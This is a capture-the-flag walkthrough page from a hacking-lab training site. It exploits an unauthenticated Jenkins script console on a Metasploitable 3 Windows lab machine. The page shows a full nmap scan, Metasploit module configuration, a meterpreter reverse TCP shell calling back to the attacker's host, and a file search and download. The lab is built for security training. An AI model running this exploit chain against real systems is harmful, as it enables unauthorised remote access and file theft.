<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <meta name="description" content="Metasploitable 3 Windows - King of Diamonds">

        <meta property="og:site_name" content="Hacker Lab Learn"/>
        <meta property="og:title" content="King of Diamonds | Hacker Lab Learn"/>
        <meta property="og:description" content="Metasploitable 3 Windows - King of Diamonds"/>
        <meta property="og:url" content="https://my-jigsaw-docs.com/walkthroughs/metasploitable-3-windows/king-of-diamonds"/>
        <meta property="og:image" content="/assets/img/logo.png"/>
        <meta property="og:type" content="website"/>

        <meta name="twitter:image:alt" content="Hacker Lab Learn">
        <meta name="twitter:card" content="summary_large_image">

        
        <title>Hacker Lab Learn | King of Diamonds</title>

        <link rel="home" href="https://my-jigsaw-docs.com">
        <link rel="icon" href="/favicon.ico">

        
                    <!-- Insert analytics code here -->
        
        <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,300i,400,400i,700,700i,800,800i" rel="stylesheet">
        <link rel="stylesheet" href="/assets/build/css/main.css?id=829c17c8b6b463371e17">

            </head>

    <body class="flex flex-col justify-between min-h-screen bg-grey-lightest text-grey-darkest leading-normal font-sans">
        <header class="flex items-center shadow bg-white border-b h-24 mb-8 py-4" role="banner">
            <div class="container flex items-center max-w-4xl mx-auto px-4 lg:px-8">
                <div class="flex items-center">
                    <a href="/" title="Hacker Lab Learn home" class="inline-flex items-center">
                        <img class="h-8 md:h-10 mr-3" src="/assets/img/logo.svg" alt="Hacker Lab Learn logo" />

                        <h1 class="text-lg md:text-2xl text-blue-darkest font-semibold hover:text-blue-dark my-0 pr-4">Hacker Lab Learn</h1>
                    </a>
                </div>

                <div class="flex flex-1 justify-end items-center text-right md:pl-10">
                                    </div>
            </div>

                <button class="flex justify-center items-center bg-blue border border-blue h-10 mr-4 px-5 rounded-full lg:hidden focus:outline-none"
    onclick="navMenu.toggle()"
>
    <svg id="js-nav-menu-show" xmlns="http://www.w3.org/2000/svg"
        class="fill-current text-white h-9 w-4" viewBox="0 0 32 32"
    >
        <path d="M4,10h24c1.104,0,2-0.896,2-2s-0.896-2-2-2H4C2.896,6,2,6.896,2,8S2.896,10,4,10z M28,14H4c-1.104,0-2,0.896-2,2  s0.896,2,2,2h24c1.104,0,2-0.896,2-2S29.104,14,28,14z M28,22H4c-1.104,0-2,0.896-2,2s0.896,2,2,2h24c1.104,0,2-0.896,2-2  S29.104,22,28,22z"/>
    </svg>

    <svg id="js-nav-menu-hide" xmlns="http://www.w3.org/2000/svg"
        class="hidden fill-current text-white h-9 w-4" viewBox="0 0 36 30"
    >
        <polygon points="32.8,4.4 28.6,0.2 18,10.8 7.4,0.2 3.2,4.4 13.8,15 3.2,25.6 7.4,29.8 18,19.2 28.6,29.8 32.8,25.6 22.2,15 "/>
    </svg>
</button>

        </header>

        <main role="main" class="w-full flex-auto">
            <section class="container max-w-4xl mx-auto px-6 md:px-8 py-4">
    <div class="flex flex-col lg:flex-row">
        <nav id="js-nav-menu" class="nav-menu hidden lg:block">
            <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/getting-started"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Getting Started
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">WebGoat 8 Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/general"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            General
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-introduction"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Introduction)
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-advanced"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Advanced)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Damn Vulnerable Web App (DVWA) Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/brute-force"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Brute Force
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/command-injection"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Command Injection
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/cross-site-request-forgery"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Cross Site Request Forgery (CSRF)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Ubuntu Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Ace of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/8-of-clubs"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            8 of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/5-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            5 of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Windows Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/king-of-diamonds"
            class="lvl1  active font-semibold text-blue nav-menu__item hover:text-blue"
        >
            King of Diamonds
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/ace-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Ace of Hearts
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/jack-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Jack of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Essentials</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/essentials/scp"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            scp
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh-keygen"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh-keygen
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/browser-developer-tools"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Browser Developer Tools
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <a href="/contribute"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Contribute
        </a>
    
    </li>
    </ul>
        </nav>

        <div class="w-full lg:w-3/5 break-words pb-16 lg:pl-4" v-pre>
            <h1>King of Diamonds</h1>
<p>1. SSH into your kali instance, reference the <a href="/walkthroughs/metasploitable-3-ubuntu/quickstart">quickstart guide</a> if you need a refresher on how to do this.
Once logged into you Kali instance, let's run an <strong>nmap</strong> scan.
Replace <code>138.68.237.0</code> with the IP address of your metasploitable 3 instance.</p>
<pre><code class="language-bash">root@ab0c1708a5a0:~# nmap -sV -Pn -T4 -p 1-65535 -vv 138.68.237.0
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 17:08 UTC
NSE: Loaded 43 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 17:08
Completed Parallel DNS resolution of 1 host. at 17:08, 0.00s elapsed
Initiating SYN Stealth Scan at 17:08
Scanning 138.68.237.0 [65535 ports]
Discovered open port 3306/tcp on 138.68.237.0
Discovered open port 80/tcp on 138.68.237.0
Discovered open port 21/tcp on 138.68.237.0
Discovered open port 8080/tcp on 138.68.237.0
Discovered open port 139/tcp on 138.68.237.0
Discovered open port 445/tcp on 138.68.237.0
Discovered open port 3389/tcp on 138.68.237.0
Discovered open port 22/tcp on 138.68.237.0
Discovered open port 4848/tcp on 138.68.237.0
Discovered open port 9200/tcp on 138.68.237.0
Discovered open port 8020/tcp on 138.68.237.0
Discovered open port 8282/tcp on 138.68.237.0
Discovered open port 3000/tcp on 138.68.237.0
Discovered open port 8585/tcp on 138.68.237.0
Discovered open port 8022/tcp on 138.68.237.0
Discovered open port 3500/tcp on 138.68.237.0
Discovered open port 8484/tcp on 138.68.237.0
Discovered open port 8181/tcp on 138.68.237.0
Discovered open port 1617/tcp on 138.68.237.0
Discovered open port 8383/tcp on 138.68.237.0
Discovered open port 2222/tcp on 138.68.237.0
Discovered open port 6697/tcp on 138.68.237.0
Discovered open port 5985/tcp on 138.68.237.0
Completed SYN Stealth Scan at 17:08, 1.92s elapsed (65535 total ports)
Initiating Service scan at 17:08
Scanning 23 services on 138.68.237.0
Service scan Timing: About 69.57% done; ETC: 17:12 (0:01:06 remaining)
Completed Service scan at 17:11, 156.11s elapsed (23 services on 1 host)
NSE: Script scanning 138.68.237.0.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 24.77s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 1.01s elapsed
Nmap scan report for 138.68.237.0
Host is up, received user-set (0.00015s latency).
Scanned at 2019-06-02 17:08:37 UTC for 184s
Not shown: 65512 closed ports
Reason: 65512 resets
PORT     STATE SERVICE           REASON         VERSION
21/tcp   open  ftp               syn-ack ttl 62 Microsoft ftpd
22/tcp   open  ssh               syn-ack ttl 62 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http              syn-ack ttl 62 Microsoft IIS httpd 7.5
139/tcp  open  netbios-ssn?      syn-ack ttl 62
445/tcp  open  microsoft-ds?     syn-ack ttl 62
1617/tcp open  rmiregistry       syn-ack ttl 62 Java RMI
2222/tcp open  ssh               syn-ack ttl 62 OpenSSH 7.1 (protocol 2.0)
3000/tcp open  ppp?              syn-ack ttl 62
3306/tcp open  mysql?            syn-ack ttl 62
3389/tcp open  ms-wbt-server?    syn-ack ttl 62
3500/tcp open  rtmp-port?        syn-ack ttl 62
4848/tcp open  ssl/appserv-http? syn-ack ttl 62
5985/tcp open  http              syn-ack ttl 62 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6697/tcp open  ircs-u?           syn-ack ttl 62
8020/tcp open  http              syn-ack ttl 62 Apache httpd
8022/tcp open  http              syn-ack ttl 62 Apache Tomcat/Coyote JSP engine 1.1
8080/tcp open  http              syn-ack ttl 62 Sun GlassFish Open Source Edition  4.0
8181/tcp open  intermapper?      syn-ack ttl 62
8282/tcp open  http              syn-ack ttl 62 Apache Tomcat/Coyote JSP engine 1.1
8383/tcp open  ssl/http          syn-ack ttl 62 Apache httpd
8484/tcp open  http              syn-ack ttl 62 Jetty winstone-2.8
8585/tcp open  http              syn-ack ttl 62 Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
9200/tcp open  http              syn-ack ttl 62 Elasticsearch REST API 1.1.1 (name: Vector; Lucene 4.7)
Service Info: OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 184.28 seconds
           Raw packets sent: 65535 (2.884MB) | Rcvd: 65535 (2.621MB)
</code></pre>
<p>2. Visiting the open http ports through a browser, you'll see that <a href="http://138.68.237.0:8484">http://138.68.237.0:8484</a> has a Jenkins CI application installed.</p>
<img src="/assets/images/walkthroughs/metasploitable-3-windows/king-of-diamonds/1-port-8484.PNG">
<p>3. Start up metasploit.</p>
<pre><code class="language-bash">root@9984d31ca3c1:~# msfconsole

# cowsay++
 ____________
&lt; metasploit &gt;
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v4.16.58-dev                         ]
+ -- --=[ 1769 exploits - 1007 auxiliary - 307 post       ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf &gt;</code></pre>
<p>4. Use a jenkins exploit.</p>
<pre><code class="language-bash">msf5 &gt; use exploit/multi/http/jenkins_script_console
msf5 exploit(multi/http/jenkins_script_console) &gt; show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /jenkins/        yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Windows</code></pre>
<p>5. Set RHOST and RPORT options which are both required.</p>
<pre><code class="language-bash">msf5 exploit(multi/http/jenkins_script_console) &gt; set RHOST 138.68.237.0
RHOST =&gt; 138.68.237.0
msf5 exploit(multi/http/jenkins_script_console) &gt; set RPORT 8484
RPORT =&gt; 8484
msf5 exploit(multi/http/jenkins_script_console) &gt; show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     138.68.237.0     yes       The target address range or CIDR identifier
   RPORT      8484             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /jenkins/        yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Windows</code></pre>
<p>6. Browse compatible payloads.</p>
<pre><code class="language-bash">msf5 exploit(multi/http/jenkins_script_console) &gt; show payloads

Compatible Payloads
===================

   #    Name                                                Disclosure Date  Rank    Check  Description
   -    ----                                                ---------------  ----    -----  -----------
   1    generic/custom                                                       normal  No     Custom Payload
   2    generic/debug_trap                                                   normal  No     Generic x86 Debug Trap
   3    generic/shell_bind_tcp                                               normal  No     Generic Command Shell, Bind TCP Inline
   ... more payloads ...
   52   windows/meterpreter/reverse_tcp                                      normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   ... even more payloads</code></pre>
<p>7. Use meterpreter payload whenever possible</p>
<pre><code>msf5 exploit(multi/http/jenkins_script_console) &gt; set payload windows/meterpreter/reverse_tcp
payload =&gt; windows/meterpreter/reverse_tcp
msf5 exploit(multi/http/jenkins_script_console) &gt; show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     138.68.237.0     yes       The target address range or CIDR identifier
   RPORT      8484             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /jenkins/        yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows</code></pre>
<p>8. Set required TARGETURI, LHOST and LPORT properties.
Replace <code>142.93.88.141</code> with the IP address of your Kali instance.</p>
<pre><code class="language-bash">msf5 exploit(multi/http/jenkins_script_console) &gt; set LPORT 9990
LPORT =&gt; 9990
msf5 exploit(multi/http/jenkins_script_console) &gt; set LHOST 142.93.88.141
LHOST =&gt; 142.93.88.141
msf5 exploit(multi/http/jenkins_script_console) &gt; set TARGETURI /
TARGETURI =&gt; /
msf5 exploit(multi/http/jenkins_script_console) &gt; show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     138.68.237.0     yes       The target address range or CIDR identifier
   RPORT      8484             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     142.93.88.141    yes       The listen address (an interface may be specified)
   LPORT     9990             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows</code></pre>
<p>9. Run the exploit. </p>
<pre><code class="language-bash">msf5 exploit(multi/http/jenkins_script_console) &gt; exploit

[-] Handler failed to bind to 142.93.88.141:9990:-  -
[*] Started reverse TCP handler on 0.0.0.0:9990
[*] Checking access to the script console
[*] No authentication required, skipping login...
[*] 138.68.237.0:8484 - Sending command stager...
[*] Command Stager progress -   2.06% done (2048/99626 bytes)
[*] Command Stager progress -   4.11% done (4096/99626 bytes)
[*] Command Stager progress -   6.17% done (6144/99626 bytes)
[*] Command Stager progress -   8.22% done (8192/99626 bytes)

...more progress logging...

[*] Command Stager progress - 100.00% done (99626/99626 bytes)

meterpreter &gt;</code></pre>
<p>10. Search for flags.</p>
<pre><code class="language-bash">meterpreter &gt; cd ..
meterpreter &gt; cd ..
meterpreter &gt; pwd
C:\
meterpreter &gt; search -f *_of_* ./
Found 61 results...
    c:\jack_of_diamonds.png
    c:\inetpub\wwwroot\seven_of_hearts.html (2439511 bytes)
    c:\inetpub\wwwroot\six_of_diamonds.zip (384916 bytes)

    ...more search results...

    c:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds-150x150.png (46738 bytes)
    c:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds-214x300.png (130832 bytes)
    c:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds.png (585695 bytes)
    c:\Windows\three_of_spades.png (519696 bytes)
    c:\Windows\winsxs\FileMaps\$$_resources_ease_of_access_themes_e29108c7f81ea04c.cdf-ms (1028 bytes)</code></pre>
<p>11. Download the king_of_damonds.png file.</p>
<pre><code class="language-bash">meterpreter &gt; download ./wamp/www/wordpress/wp-content/uploads/2016/09/king_of_damonds.png
[*] Downloading: ./wamp/www/wordpress/wp-content/uploads/2016/09/king_of_damonds.png -&gt; king_of_damonds.png
[*] Downloaded 571.97 KiB of 571.97 KiB (100.0%): ./wamp/www/wordpress/wp-content/uploads/2016/09/king_of_damonds.png -&gt; king_of_damonds.png
[*] download   : ./wamp/www/wordpress/wp-content/uploads/2016/09/king_of_damonds.png -&gt; king_of_damonds.png</code></pre>
<p>12. SCP the file to your local computer.
Replace <code>142.93.88.141</code> with the IP address of your Kali instance.</p>
<pre><code class="language-bash">$ scp -i ../hacker-lab hacker-lab@142.93.88.141:/home/hacker-lab/king_of_damonds.png ./
Enter passphrase for key '../hacker-lab':
king_of_damonds.png</code></pre>
<p>13. Flag!</p>
<img src="/assets/images/walkthroughs/metasploitable-3-windows/king-of-diamonds/king_of_damonds.PNG">        </div>
    </div>
</section>
        </main>

        <script src="/assets/build/js/main.js?id=ba3916078c37342007f3"></script>

        <script>
    const navMenu = {
        toggle() {
            const menu = document.getElementById('js-nav-menu');
            menu.classList.toggle('hidden');
            menu.classList.toggle('lg:block');
            document.getElementById('js-nav-menu-hide').classList.toggle('hidden');
            document.getElementById('js-nav-menu-show').classList.toggle('hidden');
        },
    }
</script>

        <footer class="bg-white text-center text-sm mt-12 py-4" role="contentinfo">
            <ul class="flex flex-col md:flex-row justify-center list-reset">
                <li class="md:mr-2">
                    &copy; <a href="https://thehackerlab.co" title="The Hacker Lab website">The Hacker Lab, LLC</a> 2019.
                </li>

                <li>
                    Built with <a href="http://jigsaw.tighten.co" title="Jigsaw by Tighten">Jigsaw</a>
                    and <a href="https://tailwindcss.com" title="Tailwind CSS, a utility-first CSS framework">Tailwind CSS</a>.
                </li>
            </ul>
        </footer>
    </body>
</html>
